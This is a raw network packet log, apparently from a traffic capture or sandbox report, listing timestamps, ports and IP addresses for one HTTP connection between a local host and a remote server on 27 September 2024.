Sep 27, 2024 00:29:05.131158113 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.131170988 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.131227970 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.131227970 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.131896019 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.131908894 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.131922007 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.131943941 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.131957054 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.131968021 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.131972075 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.131972075 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.131979942 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.132416964 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.132416964 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.132725954 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.132780075 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.132791996 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.132802963 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.132823944 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.132823944 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.133213997 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.222553015 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.222722054 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.222769022 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.222769022 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.222882986 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.222894907 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.222908020 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.222919941 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.222935915 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.222965956 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.222965956 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.223140001 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.223153114 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.223165035 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.223176956 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.223201990 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.223201990 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.223201990 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.223298073 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.223501921 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.223524094 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.223536015 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.223548889 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.223553896 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.223560095 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.223567009 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.223583937 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.223627090 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.223627090 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.223797083 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.224261045 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.224281073 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.224292040 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.224303007 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.224309921 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.224319935 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.224325895 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.224332094 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.224335909 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.224335909 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.224447012 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.224447012 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.224905968 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.224961042 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.224976063 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.225013971 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.225013971 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.225013971 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.225018024 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.225032091 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.225044012 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.225081921 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.225092888 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.225104094 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.225121021 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.225121021 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.225121021 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.225692987 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.225799084 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.225822926 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.225873947 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.225886106 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.225914955 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.225914955 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.225914955 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.225949049 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.225960970 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.225975990 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.225985050 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.225985050 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.225989103 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.226002932 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.226037025 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.226037025 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.226037025 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.226708889 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.226807117 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.226815939 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.226834059 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.226846933 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.226857901 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.226869106 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.226886034 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.226893902 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.226893902 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.226893902 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.226906061 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.226918936 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.226967096 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.226967096 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.226967096 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.227699041 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.227713108 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.227732897 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.227744102 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.227755070 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.227766991 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.227778912 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.227778912 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.227796078 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.227808952 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.227821112 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.227855921 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.227855921 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.227855921 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.228516102 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.228532076 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.228543043 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.228555918 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.228566885 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.228569984 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.228606939 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.228606939 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.313011885 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.313114882 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.313210011 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.313210011 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.313777924 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.313791037 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.313802958 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.313918114 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.313918114 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.314160109 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.314172983 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.314183950 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.314196110 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.314207077 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.314218044 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.314291000 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.314291000 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.314740896 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.314752102 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.314764023 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.314804077 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.314815044 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.314816952 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.314816952 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.314831018 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.314843893 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.314862013 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.314862013 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.314862967 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.314876080 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.314888954 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.314950943 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.314950943 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.314950943 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.315012932 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.315036058 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.315051079 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.315061092 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.315073013 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.315084934 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.315087080 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.315087080 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.315099001 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.315146923 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.315155983 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.315155983 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.315157890 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.315165043 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.315171003 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.315179110 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.315236092 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.315260887 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.315274954 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.315354109 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.320822954 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.320837021 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.320847988 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.320859909 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.320879936 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.320892096 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.320903063 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.320915937 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.320919991 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.320930004 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.320940971 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.320952892 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.320962906 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.320962906 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.320974112 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.320986986 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321000099 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321001053 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321001053 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321013927 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321026087 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321038008 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321038961 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321050882 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321063995 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321075916 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321085930 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321085930 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321090937 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321103096 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321114063 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321124077 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321135998 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321135998 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321139097 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321152925 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321163893 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321175098 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321187019 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321197033 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321209908 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321211100 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321211100 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321211100 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321223974 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321248055 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321259975 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321269989 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321279049 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321279049 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321279049 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321283102 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321295977 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321305037 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321309090 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321321964 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321332932 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321342945 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321342945 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321347952 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321360111 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321372032 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321382046 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321393967 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321417093 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321417093 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321480989 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321492910 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321502924 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321513891 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321521997 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321527004 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321538925 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321540117 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321585894 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321585894 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321643114 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321656942 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321667910 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321680069 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321696043 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321738958 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321749926 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321762085 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321762085 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321768999 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321783066 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321796894 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321806908 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321818113 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321821928 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321821928 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321821928 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321831942 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321845055 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321856976 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321862936 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321871042 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321882963 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321893930 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321903944 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.321907043 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321907043 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321933985 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.321969032 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.322108030 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.322120905 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.322132111 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.322160006 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.322179079 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.322235107 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.322246075 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.322252035 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.322263956 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.322299004 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.322334051 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.404795885 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.404808998 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.404819012 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.404829979 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.404840946 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.404854059 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.404865980 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405009031 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.405265093 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405277967 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405288935 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405299902 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405316114 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405333042 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405345917 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405354023 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.405354023 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.405354977 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.405359030 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405488968 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405499935 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405514956 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405519009 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.405519009 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.405519962 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405559063 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405570984 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405581951 CEST	80	57901	147.45.44.104	192.168.2.6
